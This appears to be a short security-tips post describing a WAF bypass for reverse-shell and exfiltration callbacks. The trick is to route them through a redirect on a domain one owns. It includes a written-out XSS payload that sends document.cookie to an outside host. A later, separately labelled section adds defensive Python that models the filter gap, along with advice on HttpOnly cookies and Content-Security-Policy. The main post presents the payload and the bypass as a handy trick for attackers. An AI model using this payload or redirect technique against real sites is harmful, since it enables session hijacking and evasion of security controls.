I came across this bypass on x.com. I wish I could remember who made the post, but whoever you are, shout out to you. If you are ever trying to do a reverse shell and it does not call back to your machine, what you can do is use a redirect on a webpage you own. So let's say you own abc.com: you can make a redirect so that when you send your payload it looks something like the following:

" ' <img src=x onerror=this.src='https://abc.com/payload/?'+document.cookie;>' --

So what would happen is you set up your redirect on your website: abc.com/payload would redirect to ATTACKER_IP:PORT. That way you are doing a bypass because the WAF is actually just checking that the address it is going to has a DNS record. I thought this was pretty cool and a fun little workaround, as many of us have websites of our own.
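
For defenders, the gap described above can be reproduced offline. This is an added example, not code from the original post or from any WAF: it compares a filter that only rejects raw-IP destinations with one that also inspects each redirect hop. The address 203.0.113.10:4444, the `constructed_lookup` stand-in for a real redirect lookup, and all function names are assumptions made for illustration.

```python
import ipaddress
import re
from urllib.parse import urlsplit

URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.IGNORECASE)

# Constructed inputs: the page's payload, and the same payload aimed at a raw IP.
VIA_DOMAIN = "\" ' <img src=x onerror=this.src='https://abc.com/payload/?'+document.cookie;>' --"
VIA_IP = VIA_DOMAIN.replace("https://abc.com/payload/", "http://203.0.113.10:4444/")


def constructed_lookup(url):
    """Stand-in for an HTTP HEAD request: return the Location target, or None."""
    if url.startswith("https://abc.com/payload"):
        return "http://203.0.113.10:4444/"  # constructed documentation address
    return None


def host_is_ip(url):
    """True when the URL's host is an IP literal rather than a DNS name."""
    host = urlsplit(url).hostname or ""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def name_only_filter_allows(value):
    """The weak check: pass anything whose destination is a hostname."""
    return not any(host_is_ip(u) for u in URL_RE.findall(value))


def redirect_chain(url, lookup, max_hops=5):
    """Collect the URL plus every redirect hop, bounded and loop-safe."""
    chain = [url]
    while len(chain) <= max_hops:
        nxt = lookup(chain[-1])
        if not nxt or nxt in chain:
            break
        chain.append(nxt)
    return chain


def redirect_aware_filter_allows(value, lookup):
    """Reject when any hop of any embedded URL lands on an IP literal."""
    return not any(host_is_ip(hop)
                   for u in URL_RE.findall(value)
                   for hop in redirect_chain(u, lookup))
```

Destination checks of either kind are only a secondary control; output encoding, `HttpOnly` session cookies and a restrictive `img-src` Content-Security-Policy stop the cookie from leaving regardless of where the URL points.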